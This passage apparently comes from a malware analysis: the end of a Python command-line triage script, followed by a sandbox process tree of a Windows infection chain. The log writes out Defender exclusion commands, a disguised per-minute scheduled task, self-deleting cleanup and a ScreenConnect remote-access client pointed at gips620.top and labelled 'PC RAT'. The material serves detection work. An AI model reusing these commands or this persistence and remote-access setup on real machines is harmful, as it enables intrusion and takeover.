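    r'schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE',
    r'powershell ping 127.0.0.1; del in.exe',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi',
]

SAMPLE_FINDINGS = triage(SAMPLE_CMDLINES)

if __name__ == "__main__":
    for name, detail in SAMPLE_FINDINGS:
        print(f"{name:28} {detail}")
```

Eight of the ten sample lines produce a finding; the unpassworded inner 7z stages and the Edge launch of the Microsoft Store page do not, which is the intended behaviour: the inner archives are only interesting because of the first one, and the Store page is the decoy shown to the user.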
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2664
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:324
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe"C:\Users\Admin\AppData\Local\Temp\055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\pppkes"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe"C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2904 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe" & rd /s /q "C:\ProgramData\T0HDJM7QQ9RI" & exit6⤵
- System Location Discovery: System Language Discovery
PID:5412 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6700
-
-
-
-
C:\pppkes\cfe32a70b98540d9861909672f4b70a8.exe"C:\pppkes\cfe32a70b98540d9861909672f4b70a8.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0df746f8,0x7fff0df74708,0x7fff0df747187⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:27⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:87⤵PID:2384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:17⤵PID:2884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:17⤵PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:17⤵PID:6740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:17⤵PID:6748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:87⤵PID:7104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:5228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:17⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:17⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3496 /prefetch:27⤵PID:3916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"5⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1864
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:656
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018024001\7796213aa8.exe"C:\Users\Admin\AppData\Local\Temp\1018024001\7796213aa8.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5960 -
C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6444
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018105001\4ba8da5cdc.exe"C:\Users\Admin\AppData\Local\Temp\1018105001\4ba8da5cdc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3760
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018107001\3573f91eb8.exe"C:\Users\Admin\AppData\Local\Temp\1018107001\3573f91eb8.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 8045⤵
- Program crash
PID:6816
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018108001\4913480162.exe"C:\Users\Admin\AppData\Local\Temp\1018108001\4913480162.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 5365⤵
- Program crash
PID:7068
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018109001\804a4385fd.exe"C:\Users\Admin\AppData\Local\Temp\1018109001\804a4385fd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\cellfzj"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        PID: 5148

        C:\cellfzj\057af55804f941a1bfb3623a361b7ab9.exe
        Command line: "C:\cellfzj\057af55804f941a1bfb3623a361b7ab9.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
        PID: 5200

      C:\Users\Admin\AppData\Local\Temp\1018110001\b2b654d781.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1018110001\b2b654d781.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID: 5300

        C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        PID: 5992

          C:\Windows\system32\mode.com
          Command line: mode 65,10
          PID: 6544

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 1432

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_7.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 5256

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_6.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 2372

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_5.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 656

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_4.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 5244

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_3.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 6732

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_2.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 4360

          C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_1.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 6072

          C:\Windows\system32\attrib.exe
          Command line: attrib +H "in.exe"
          - Views/modifies file attributes
          PID: 6368

          C:\Users\Admin\AppData\Local\Temp\main\in.exe
          Command line: "in.exe"
          - Executes dropped EXE
          PID: 5940

            C:\Windows\SYSTEM32\attrib.exe
            Command line: attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
            - Views/modifies file attributes
            PID: 4876

            C:\Windows\SYSTEM32\attrib.exe
            Command line: attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
            - Views/modifies file attributes
            PID: 1908

            C:\Windows\SYSTEM32\schtasks.exe
            Command line: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
            - Scheduled Task/Job: Scheduled Task
            PID: 6088

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell ping 127.0.0.1; del in.exe
            - System Network Configuration Discovery: Internet Connection Discovery
            PID: 7004

              C:\Windows\system32\PING.EXE
              Command line: "C:\Windows\system32\PING.EXE" 127.0.0.1
              - System Network Configuration Discovery: Internet Connection Discovery
              - Runs ping.exe
              PID: 2140
      C:\Users\Admin\AppData\Local\Temp\1018111001\c59adc6d69.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1018111001\c59adc6d69.exe"
      - Enumerates VirtualBox registry keys
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      PID: 5416

      C:\Users\Admin\AppData\Local\Temp\1018112001\68c2153f03.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1018112001\68c2153f03.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      PID: 6164

      C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      PID: 7100

        C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        PID: 6020

      C:\Users\Admin\AppData\Local\Temp\1018114001\6c81dae2fe.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\1018114001\6c81dae2fe.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID: 924
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  - Drops startup file
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID: 5544

C:\Windows\system32\msiexec.exe
Command line: C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4988

  C:\Windows\syswow64\MsiExec.exe
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 608F846364848661854D13212C870479 C
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 4916

    C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIB73A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240629609 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID: 1460

  C:\Windows\system32\srtasks.exe
  Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  PID: 5636

  C:\Windows\syswow64\MsiExec.exe
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 9CC2DD03DEC9CAFD32A4393FC77AA90C
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID: 2412

  C:\Windows\syswow64\MsiExec.exe
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding BBEBA779DD3F0BA56340840E5746ADA3 E Global\MSI0000
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID: 5844

C:\Windows\system32\vssvc.exe
Command line: C:\Windows\system32\vssvc.exe
- Checks SCSI registry key(s)
PID: 4600

C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 5048

C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 1268

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID: 6672
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe
Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=61f772e9-8983-4fd3-833d-601341ed72a3&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID: 5764

  C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe
  Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "db441856-4ed5-4403-92b8-b241d6ae3912" "User"
  - Executes dropped EXE
  PID: 6240

  C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe
  Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "913eccb5-6cbb-4e67-8b83-d2af233776b2" "System"
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID: 6584

C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 6680 -ip 6680
PID: 6752

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID: 6460

C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1540 -ip 1540
PID: 4784

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID: 5816

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Command line: C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 5840

  C:\Windows\explorer.exe
  Command line: explorer.exe
  PID: 5612

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  - System Network Configuration Discovery: Internet Connection Discovery
  PID: 5456

    C:\Windows\system32\PING.EXE
    Command line: "C:\Windows\system32\PING.EXE" 127.1.10.1
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID: 5076
